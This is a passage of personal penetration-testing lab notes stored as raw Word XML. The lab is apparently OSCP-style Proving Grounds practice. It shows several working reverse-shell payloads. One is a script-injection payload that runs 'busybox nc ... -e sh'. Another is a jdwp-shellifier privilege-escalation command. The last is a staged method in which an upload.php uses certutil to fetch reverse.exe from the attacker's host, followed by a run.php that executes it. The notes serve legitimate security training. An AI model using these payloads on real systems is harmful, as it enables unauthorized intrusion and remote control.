    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="781"/>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-e sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "Execute /bin/sh and attach it to the socket"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is part of nc, not busybox. Could have also done</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used this as my payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="781"/>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${script:javascript:java.lang.Runtime.getRuntime().exec(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'busybox nc 192.168.45.232 4444 -e sh'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is what we did in XXXXXXXXX-B .150 for priv esc. We had command execution using exploit, but nc didn't work, so we used busybox and it worked. Same busybox payload as before:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we run exploit. notice we had to use busybox, just like in the foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 jdwp-shellifier.py -t 127.0.0.1 --cmd '</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox nc 192.168.45.232 4444 -e /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E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6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_82ldiuvu0up" w:id="126"/>
      <w:bookmarkEnd w:id="126"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upload and execute reverse shell upload.php and run.php (Staged Reverse Shell via Web Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EAA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The point of this strategy is to trigger the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell. It's not a PHP shell, so you can't just trigger it by accessing it on the web page. You need a run.php to trigger it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the web server runs PHP, then try a variety of PHP shells first since it's much simpler than this strategy. For example, if you are targeting windows, try the PHP Ivan Sincek shell (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId314">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">revshells.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) since it works well for windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1447"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is important to note that if a web server is running PHP, t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hen simply visiting a .php reverse shell via the web will trigger it (like visiting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.10.10/reverse.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. So, no need for all this upload and run stuff. But, this is a really good strategy if PHP rev shells are blocked or are just not working, and you need to switch to like a .exe shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another name for this would be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged Reverse Shell via Web Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" since it comes in multiple "stages" and involves web execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This only works though if the website is running PHP. Possibly could work if you change upload.php and run.php to another language, but this is never seen. I asked chatGPT to generate upload.php for this case, and you can look at that sub–section below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And this only works for .exe payloads, but I asked chatGPT to create run.php for non .exe payloads, so you could possibly try that in case the target machine is a Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First seen in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId315">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">AuthBy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId316">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EB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Generate reverse shell executable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put it in a file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Prepare PHP scripts to deliver &amp; execute the payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You create two PHP scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$download = system('certutil.exe -urlcache -split -f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.49.243:80/reverse.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC3">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EC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When this script runs, it will try and download the reverse.exe from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> your local Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (replace the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.243:80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and save it on it's own server as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="703"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
